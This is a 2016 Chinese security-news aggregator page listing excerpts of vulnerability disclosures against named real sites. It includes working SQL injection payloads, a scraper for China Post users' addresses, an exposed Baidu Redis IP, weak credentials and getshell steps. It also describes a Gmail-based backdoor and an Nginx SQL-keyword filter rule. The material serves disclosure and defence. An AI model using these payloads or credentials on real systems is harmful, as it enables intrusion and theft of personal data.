记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

这名乌克兰黑客成为FBI的最佳武器和黑客的噩梦

2001年1月的一个星期四,马克西姆· 伊戈尔· 波波夫,一个20岁的乌克兰小伙子,略带些许紧张地走着伦敦的美国大使馆的大门。虽然波波夫看上去和那些申请签证的交换学生没什么不同,可实际上,他是一名黑客,是一个对美国公司进行勒索和欺诈东欧黑客团伙的一分子。在冷战结束后, 这样的网络攻击行为被很多人比做是美国和前苏联集团有组织犯罪分子之间的新冷战。 而长着一张圆圆的娃娃脸,带着眼镜,理一个平头的波波夫,正准备成为这场新冷战的第一个叛逃者。在走出这一步之前, 波波夫在四个月期间与大使馆进行了很多次的电话沟通并且两次访问了大使馆。 现在,他终于向这里的FBI助理武官出示自己的护照,并听从他们做最后的安排。没一会儿,在乌克兰阴冷的冬天里,他穿过格罗夫纳广场到了一个使馆为他特别安排的酒店。在酒店房间里,他一边悠闲地喝着m
发布时间:2016-05-29 16:15 | 阅读:191 | 评论:0 | 标签:牛闻牛评 FBI 数据泄露 网络犯罪 黑客

中通服某系统用户体制不严导致Getshell(内网渗透成功拿下IDC业务主机)

缺陷地址:http://mask 区域1.://**.**.**/ztxxEM/使用拼音+888888爆破得到code 区域zhangjianchenlingyangyun但是都没有上传权限寻找拥有上传权限用户xuyh888888拥有上传权限http://mask 区域1.://**.**.**/ztxxEM//emfile//S4409-2015-003941//ZS_S4409-2015-003941_20160223092603//order/p1aft13f098jkkf0tmr91g9qk5.jsp数据库可连:code 区域jdbcUrl= jdbc:oracle:thin:@**.**.**.**:1521:orcldriverClass= oracle.jdbc.OracleDriveru
发布时间:2016-05-29 03:00 | 阅读:315 | 评论:0 | 标签:无

唯品会某分站SQL注入漏洞 (附利用技巧)

#1 注入点http://share.vip.com/Acts/SetCount?id=63200#2 PAYLOAD, 5秒后打开网页http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP(5)))RING) and 'RING'='RING#3 基于时间差注入code 区域(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING)#* 另一种注入方式code 区域
发布时间:2016-05-29 03:00 | 阅读:326 | 评论:0 | 标签:注入 漏洞

中国邮政集邮网上营业厅某漏洞可收集大量用户收件信息

中国邮政集邮网上营业厅大量用户收件信息泄漏 漏洞证明: code 区域jiyou.biz.11185.cn/retail/JSONGetUserAddressWithUserID.html写个简单的爬虫,爬下code 区域import reimport requestsimport sysreload(sys) sys.setdefaultencoding('utf8')url="http://jiyou.biz.11185.cn/retail/JSONGetUserAddressWithUserID.html"j=0k=0for i in range(1,9999999): j=20100000+i payload={'
发布时间:2016-05-29 03:00 | 阅读:344 | 评论:0 | 标签:漏洞

百度多台Redis服务器未授权访问

redis未授权访问:IP:180.76.140.233code 区域[email protected] :~/.ssh# redis-cli -h 180.76.140.233 -p 6379180.76.140.233:6379> info# Serverredis_version:2.8.4redis_git_sha1:00000000redis_git_dirty:0redis_build_id:a44a05d76f06a5d9redis_mode:standaloneos:Linux 3.13.0-32-generic x86_64arch_bits:64multiplexing_api:epollgcc_version:4.8.2process_id:24318run_id:
发布时间:2016-05-29 03:00 | 阅读:305 | 评论:0 | 标签:无

搜狐焦点主站一处SQL注入

目标:house.focus.cn检测发现以下地方存在SQL注入:(注入参数set_type,布尔盲注)code 区域http://house.focus.cn/dmc/type_list.php?bathroom=0&bedroom=0&group_id=2572&page=2&price=&proj_id=1619&set_type=0&sittingroom=0&total_price=Payload:code 区域set_type=0 and 1=1code 区域set_type=0 and 1=2 漏洞证明: 1、当前数据库用户2、当前数据库 修复方案: 请多指教~
发布时间:2016-05-29 03:00 | 阅读:227 | 评论:0 | 标签:注入

百度传课某处存在SQL注入

注入点 注入参数 tokencode 区域GET /?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b*&clientType=1&mod=user&act=pushIOS HTTP/1.1Host: pop.client.chuanke.comAccept-Language: zh-cnConnection: keep-aliveAccept: */*User-Agent: ChuanKeIPhone/2.8.6 CFNetwork/672.1.14 Darwin/14.0.0Host: pop.client.chuanke.comPragma: no-cacheContent-Type
发布时间:2016-05-29 03:00 | 阅读:234 | 评论:0 | 标签:注入

穿森马就测森马(从java反序列化到内网)

**.**.**.**:8081/ 当我看到这个URL时,穿着森马套装的我立刻察觉到这个URL有问题!我平复一下心情,整理了一下衣衫,把他放进了工具:是他!是他是他!就是他!JAVA反序列化!在这个moment,一位森马骚年准备要和森马来一次XXXX了。··哎哟呵,系统权限,找目录目录,找啊找,上传shell。相信我,买手评论这个我也不知道是什么东西··,森马衣服确实便宜,经常有活动,一有活动我就让我妈给钱去买····不知道是不是今天穿森马的缘故,幸运值比较高。又或服务器对穿森马的来者不拒呢··成功添加账户!··端口转发,我要日进去了!··此时此刻,我内心久久不能平静这就是森马的内内内内网!··感觉身上的森马套装更耀眼夺目了呢·· 漏洞证明: 加盟商and直营:16万多家····好多数
发布时间:2016-05-29 03:00 | 阅读:199 | 评论:0 | 标签:无

同程旅游网主站的一处SQL注入

http://www.ly.com/bustour/json/GetOpenedCityList.html?OrdTypeId=165&typeIds=155,156,157)%20and%20104=104--%20&iid=0.16461771167814732 有数据http://www.ly.com/bustour/json/GetOpenedCityList.html?OrdTypeId=165&typeIds=155,156,157)%20and%20104=105--%20&iid=0.16461771167814732 没有数据放入SQLmap中注入 漏洞证明: 部分测试的数据code 区域[22:09:27] [INFO] retri
发布时间:2016-05-29 03:00 | 阅读:208 | 评论:0 | 标签:注入

2016中国网络安全年会在四川成都召开

2016中国网络安全年会在四川成都召开 2016-05-28 11:32:48 作者:国家互联网应急中心 阅读:1217次 点赞(0) 收藏 分享到: 2016年5月25日至26日,以“聚网络英才·筑安全生态”为主题
发布时间:2016-05-28 18:35 | 阅读:264 | 评论:0 | 标签:无

从零开始学Fuzzing系列:带领nduja突破Grinder的壁垒

文章作者:walkerfuz0×00 写在前面站在巨人的肩膀上,才能看的更远,开发项目亦是如此。四年前开源的Grinder项目,和借助于它运行的nduja,着实让浏览器漏洞挖掘飞入了寻常百姓家。但随着时间的考验,Grinder也遇到了让人爱恨交加的尴尬:明明产生了Crash,可就是无法重现。有多少人和我一样,从初识Grinder的激动,到分离时的落寞,也见证了一代怀揣梦想的挖洞人的足迹。在现有项目的基础上,对其进行改进,乃是一种进步,于是出现了Morph项目。Morph起初的定位就是解决Grinder架构中存在的本质问题:样本无法稳定重现,所以才有了前面《浏览器挖掘框架Morph诞生记》中讲述的“静态随机数组”的尝试,但随之带来的并发症却是:样本难以精简。本文正是为解决这个问题而
发布时间:2016-05-28 17:45 | 阅读:210 | 评论:0 | 标签:WEB安全 morph、Fuzzing、Grinder log静态化、浏览器漏洞挖掘 浏览器 漏洞挖掘

基于Python使用Gmail通信的Windows后门工具——Gdog

*本工具仅供安全学习和教学用途,禁止非法使用Gdog是一款基于Python,以Gmail作为命令和控制服务器的Winddows后门工具,具有隐蔽性的优势,可以帮助安全测试工程师进行渗透测试工作。所需条件    Python 2.x    PyCrypto module    WMI module    Enum34 module    Netifaces module特点通信数据加密(AES)+SHA256哈希使用系统信息生成唯一的id(SHA256哈希)Job IDs是随机的SHA256哈希获取系统信息获取地理信息(城市,国家,经度,纬度 等等)获取运行的进程、
发布时间:2016-05-28 17:15 | 阅读:189 | 评论:0 | 标签:后门

火眼实验室恶意软件开源分析工具Flare-floss

许多恶意软件编写者都会通过混淆一个可执行文件的关键部分来躲避启发式的检测方法,而不是通过加强保护壳的方式。通常情况下,这些关键部分都是字符串以及用于配置域,文件以及感染的其它组件的资源。这些关键功能在静态分析过程中,使用strings.exe也得不到明文显示。FireEye实验室字符串混淆解释器(FLOSS)采用了先进的静态分析技术,从恶意软件的二进制文件中自动反混淆字符串。你可以就像使用strings.exe一样来加强对未知二进制文件的基本静态分析。FLOSS的理论知识在这里。快速运行正确使用FLOSS,要下载一个单独的可执行文件,地址:https://github.com/fireeye/flare-floss/releases有关FLOSS的详细说明,可以参考这篇文档。单独项目地址:l Windows:这
发布时间:2016-05-28 17:15 | 阅读:223 | 评论:0 | 标签:无

Nginx 防SQL注入

SQL注入原理,在URI页面加参数查询数据库,如果程序没有严格过滤字符串,就有可能导致SQL注入我们可以在前端Nginx过滤URI来防止SQL注入。配置如下什么是URL和URI,举例说明:连接   http://www.abc.com/upload.phpURI: ?at=8URL一般指?号前面的URL地址,URI指?号后面的参数注: discuz需将show和update关键字取消,否则无法登录,或获取验证码。在 server {} 里加入以下内容:if ($request_uri ~* (.*)(union%20| select%20|insert%20|delete%20|update%20|drop%20|show%20|tru
发布时间:2016-05-28 17:15 | 阅读:272 | 评论:0 | 标签:注入 nginx

万家基金主站某处限制不严格可导致Getshell并被提权涉及大量数据备份

code 区域POST /wanjia-web/json/space!uploadPic HTTP/1.1Host: www.wjasset.comContent-Length: 1791Accept: application/json, text/javascript, */*; q=0.01Origin: http://www.wjasset.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: multipart/
发布时间:2016-05-28 11:40 | 阅读:236 | 评论:0 | 标签:提权

对中兴旗下移动电商微品会的一次简单渗透

1.首先发现下面的站点存在弱口令:test/123456;code 区域http://cloud.vpclub.cn/2.成功登陆之后发现后台使用了kindeditor编辑器,测试了下,存在文件遍历漏洞;code 区域http://cloud.vpclub.cn/Common/RemoteUpload.ashx?action=managerfile&path=../3.发现根目录下存在多个web备份,果断下载下来;4.通过web.config获取到web目录的ftp账号、密码;5.直接上传一个aspx的webshell;6.服务器上接入了阿里的云盾系统,仅仅测试,因此这里放弃提权深入,再翻翻web.config,发现一条注释了的数据库配置信息;7.果然直接远程连接上数据库,发现存在大量数据库实例
发布时间:2016-05-28 11:40 | 阅读:251 | 评论:0 | 标签:移动

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,学习技术更方便

工具

推而广之

标签云

友情链接